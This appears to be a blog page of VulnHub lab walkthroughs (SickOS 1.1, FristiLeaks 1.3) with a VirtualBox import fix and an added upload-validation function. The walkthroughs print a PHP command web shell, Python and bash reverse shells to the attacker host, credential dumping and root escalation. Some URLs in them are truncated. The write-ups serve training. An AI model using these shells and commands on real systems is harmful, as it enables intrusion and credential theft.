1/19/2016

vulnhub.com sickos1.1

host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101

* log
  # 2015/12/26 19:00 -> 19:40 (40min)
  # 2015/12/26 22:10 -> 23:50 (1hr 40min)
  # 2015/12/27 18:20 -> 18:40 (20min)
  # total time = 2hr 40min

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found: 192.168.56.102

* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found: port 22/tcp ssh, 3128/tcp squid, 8080/tcp ??
  * !!exploit-db did not reveal much
  * tried: nc -n -v 192.168.56.102 3128
  * with GET /
    * found: invalid URL error
  * with GET http://127.0.0.1/
    * found: landing page with BLEHHH!!! and PHP/5.3.10-1ubuntu3.21
  * using proxy: export http_proxy="http://192.168.56.102:3128"
  * wget http://192.168.56.102/robots.txt
  * found http://192.168.56.102/wolfcms
  * !!decided to use iceweasel with proxy instead of command line
    * did not find generator metatag
    * downloaded wolfcms
      * found: README.md, requested http://192.168.56.102/wolfcms/README.md
      * found: version = 0.8.2
      * found: , requested http://192.168.56.102/wolfcms/wolf/plugins/file_manager/file_manager.css
      * found: http://192.168.56.102/wolfcms/wolf/plugins/ is also browseable
      * found: that file_manager plugin is installed
    * read 
      - https://www.wolfcms.org/download/security-patches.html
      - http://www.securityfocus.com/archive/1/521797
      - https://www.exploit-db.com/exploits/36818/
      - https://packetstormsecurity.com/files/133011/Wolf-CMS-0.8.2-Open-Redirect.html 
      - https://github.com/wolfcms/wolfcms/issues/619
    * vulnerabilities
      * file upload
      * open redirect
    * stupidly tried admin/admin
    * uploaded shell.php using file uploaded
    * http://192.168.56.102/wolfcms/public/shell.php?cmd=id
    * used shell.php 
      * found: config.php using curl http://192.168.56.ll.php -d cmd="cat ../config.php"
      * found: mysql db=wolf, username=root, password=john@123
    * used curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=mysqldump -u root -pjohn@123 mysql"
      * found:
    * used shell.php to list directories
      * found: /var/www/connect.py
    * attempted python reverse shell
      * kali - nc -vvv -l -p 1234
      * sickos - curl http://192.168.56.102/wolfcms/public/shell.php --data-urlencode "cmd=/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.101\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'"
    * attempted to get tty, inside reverse shell
      * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
    * tried to use su - sickos, using the mysql password john@123, worked!!
    * sudo bash
    * ls -l /root
    * cat a0216ea4d51874464078c618298b1367.txt
    


* appendix

// shell.php
-- start of shell.php --
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of shell.php --

Error importing into Virtualbox

Open Virtualization Format (OVF) is an open standard for packaging and distributing virtual appliances. Essentially this is meant to ensure portability of software and virtual machines across different hypervisors, such as vmware, virtualbox, etc. However, I got an error when importing an OVF file into virtualbox Version 5.0.12 r104815

"Host resource of type "Other Storage Device (20)" is supported with SATA AHCI controllers only, line 47."

Error reading "XXXXXX.ovf": Host resource of type "Other Storage Device (20)" is supported with SATA AHCI controllers only, line 47.


Result Code: VBOX_E_FILE_ERROR (0x80BB0004)
Component: ApplianceWrap
Interface: IAppliance {XXXXXX}

Fixed it by following the instructions on the forum [1]:
  1. Edited .ovf file in vim.
    • :%s/ElementName/Caption/g
    • :%s/vmware.sata.ahci/AHCI/
  2. Deleted .mf file, else get an error regarding failure to verify manifest

Attempted re-import of appliance into VirtualBox 5. Only noticeable issue was the name defaulted to "vm", which was easily resolved by double clicking name and entering correct name for the virtual machine.

References:

  1. https://forums.virtualbox.org/viewtopic.php?f=8&t=61624

vulnhub.com fristileaks1.3

host: 192.168.56.1
dhcp-server: 192.168.56.100
kali: 192.168.56.101

* log
  # 2015/12/24 14:45 -> 16:30 (1hr 45min)
  # 2015/12/25 15:00 -> 17:45 (2hr 45min)
  # total time = 4hrs 30min

* discovery - target
  * nmap --min-parallelism=100 -sP -T5 192.168.56.0/24
  * found target: 192.168.56.102
  
* discovery - services
  * nmap --min-parallelism=100 -A -T5 -p1-65535 192.168.56.102
  * found ports: 80

* enumerate port 80
  * wget http://192.168.56.102
  * cat index.html
  * wget http://192.168.56.102/images/keep-calm.png
  * wget http://192.168.56.102/robots.txt
    * robots.txt: disallow /cola /sisi /beer
  * wget http://192.168.56.102/cola/
    * since it's not the URL, and we should drink fristi
  * wget http://192.168.56.102/fristi/
    * cat index.html
      * read description meta tag regarding comment about base64
      * noticed second commented out base64
      * suspect username: eezeepz
    * extracted commented out line using vi
      * deleted other lines
      * joined all lines (:%j)
      * removed spaces (:%s/\ //g)
      * saved into fristi_img2.txt
  * base64 -d fristi_img2.txt > img2
  * file img2
  * mv img2 img2.png
  * suspect password: keKkeKKeKKeKkEkkEk

* access
  * http://192.168.56.102/fristi/
  * myusername: eezeepz, mypassword: keKkeKKeKKeKkEkkEk
  * logged into http://192.168.56.102/fristi/login_success.php
  * clicked upload file link to http://192.168.56.102/fristi/upload.php
  * uploaded img2.png and got message regarding /uploads
  * verified upload location http://192.168.56.102/fristi/uploads/img2.png

* attempted shell access using weevely (failed)
  * generated weevely shell: weevely generate password shell.php
  * cp /usr/share/weevely/shell.php .
  * attempted upload: only allowed png,jpg,gif
  * mv shell.php shell.gif
  * uploaded and connected
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * fixed python issues
    * tar zxvf PySocks-1.5.6.tar.gz
    * cd PySocks-1.5.6/
    * ./setup.py build
    * ./setup.py install
  * weevely http://192.168.56.102/fristi/uploads/shell.gif password
  * unable to connect

* used old script to execute commands
  * renamed to shell.php.jpg
  * uploaded file
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg?cmd=id
  * uid=48(apache) gid=48(apache) groups=48(apache)
  * curl http://192.168.56.102/fristi/uploads/shell.php.jpg -d cmd="cat /etc/passwd"
  * found: eezeepz, admin, fristigod, fristi
  * ls -l /home/
  * found: drwx---r-x. on eezeepz
  * ls -l /home/eezeepz
  * found: 
    * notes.txt
    * commands (various)
  * cat /home/eezeepz/notes.txt
  * found: 
    * cron runs /tmp/runthis with admin privileges every minute
    * commands chmod, df, cat, echo, ps, grep, egrep in /home/admin
    * access to /usr/bin/*
  * changed access to /home/admin
    * curl http://192s/shell.php.jpg -d cmd="echo '/home/admin/chmod 755 /home/admin/' > /tmp/runthis"
  * ls -las /home/admin/
  * found: cryptedpass.txt, cryptpass.py, and whoisyourgodnow.txt (owned by fristigod)
  * cat /home/admin/whoisyourgodnow.txt
  * found: =RFn0AKnlMHMPIzpyuTI0ITG
  * cat /home/admin/cryptedpass.txt
  * found: mVGZ3O3omkJLmy2pcuTq
  * cat /home/admin/cryptpass.py
  * found:
    * function does base64 then rot13
  * created own script to decrypt password
  * python ./decryptpass.py mVGZ3O3omkJLmy2pcuTq
  * found: thisisalsopw123
  * python ./decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
  * found: LetThereBeFristi!
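As an added defensive example (my code, not part of the write-up), a server-side upload check that would have refused both attempts above: the weevely shell renamed to shell.gif, and the PHP script renamed to shell.php.jpg, which a filter that looks only at the last extension lets through. Function and constant names are mine; the allowed types png/jpg/gif come from the upload form's own message.

```python
import os
import secrets

# Extensions the fristi upload form accepted (from the write-up); anything else is refused.
ALLOWED = {"png", "jpg", "gif"}
# Leading bytes an upload of each allowed type must carry.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Server-side-executable extensions refused anywhere in the name, not only at the end
# (assumption: the target's Apache hands any ".php" segment to mod_php, which is why
# "shell.php.jpg" still ran as PHP).
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "py", "sh"}


def validate_upload(filename, data):
    """Return (True, stored_name) for an acceptable image, else (False, reason)."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any directory part
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[-1]:
        return False, "missing extension"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, "extension not allowed: " + ext
    # Double-extension check: shell.php.jpg passes a last-extension-only filter.
    inner = set(parts[1:-1])
    if inner & EXECUTABLE:
        return False, "executable extension in name: " + base
    # Content check: a PHP file renamed to .gif (the weevely attempt) does not
    # begin with an image signature.
    if not any(data.startswith(sig) for sig in MAGIC[ext]):
        return False, "content does not match ." + ext
    # Never keep the client-supplied name; store under a random one with the
    # canonical extension so nothing the uploader chose reaches the filesystem.
    return True, secrets.token_hex(8) + "." + ext
```

Storing uploads in a directory where the web server has PHP execution disabled (for example `php_flag engine off` under mod_php) is the other half of the fix: a name and signature check alone does not stop a valid image with PHP appended.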
 
* interactive shell
  * got tired of using the php script and decided to get interactive shell
  * on kali: nc -n -vvv -l -p 80
  * ran via php: /bin/bash -i > /dev/tcp/192.168.56.101/80 0<&1 2>&1, but encoded for url as %2Fbin%2Fbash%20-i%20%3E%20%2Fdev%2Ftcp%2F192.168.56.101%2F80%200%3C%261%202%3E%261
  * now have shell (without TTY, so cannot use su yet)
  * find files owned by users
    * find / -user eezeepz 2>&1 | grep -v "Permission denied"
    * find / -user admin 2>&1 | grep -v "Permission denied"
    * find / -user fristi 2>&1 | grep -v "Permission denied"
    * find / -user fristigod 2>&1 | grep -v "Permission denied"
      * found: /var/fristigod
    * found: empty mailboxes
    * found: /var/www/notes.txt 
      * not very useful since we already figured this out
  * tried to get tty shell 
    // https://pen-testing.sans.org/blog/2014/07/08/sneaky-stealthy-su-in-web-shells
    // http://netsec.ws/?p=337
  * /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'
  * used: su fristigod and password: LetThereBeFristi!
  * cd /var/fristigod
  * ls -las 
  * found: .bash_history and .secret_admin_stuff
  * cat .bash_history
  * found: sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * ls -las /var/fristigod/.secret_admin_stuff/
  * found: suid/sgid set on doCom file and owned by root:root
  * file /var/fristigod/.secret_admin_stuff/doCom
  * strings /var/fristigod/.secret_admin_stuff/doCom
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
  * found: Usage: ./program_name terminal_command ...
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id
  * found: uid=0(root) gid=100(users) groups=100(users),502(fristigod)
  * sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom bash
  !! got root !!
  * found: cat /root/fristileaks_secrets.txt
  * cat /root/fristileaks_secrets.txt
  * found: Flag: Y0u_kn0w_y0u_l0ve_fr1st1

# Other
* /root/.c has source for doCom
* cat /root/.mysql_history
  

* appendix
// http://snipplr.com/view/72936/simple-php-backdoor-shell/
-- start of old script -- 
<?php
if(isset($_REQUEST['cmd']))
{
  $cmd = $_REQUEST['cmd'];
  system($cmd);
  echo "<pre>$cmd</pre>";
}
else
{
  echo "<pre>usage: ?cmd=</pre>";
}
?>
-- end of old script --


// modified cryptpass.py script
-- start of decryptpass.py script --
import base64, codecs, sys

# Undoes cryptpass.py, which does base64 -> reverse -> rot13; the steps are
# applied in the opposite order here: reverse -> rot13 -> base64-decode.

#def encodeString(s):
#    base64string = base64.b64encode(s)
#    return codecs.encode(base64string[::-1], 'rot13')

def decodeString(s):
    rottedString = codecs.encode(s[::-1], 'rot13')
    return base64.b64decode(rottedString)

#cryptoResult = encodeString(sys.argv[1])
#print(cryptoResult)

#decryptedResult = decodeString(cryptoResult)
#print(decryptedResult)

decryptedResult = decodeString(sys.argv[1])
print(decryptedResult.decode())  # decode() so the result prints as text under Python 3 too
-- end of decryptpass.py script --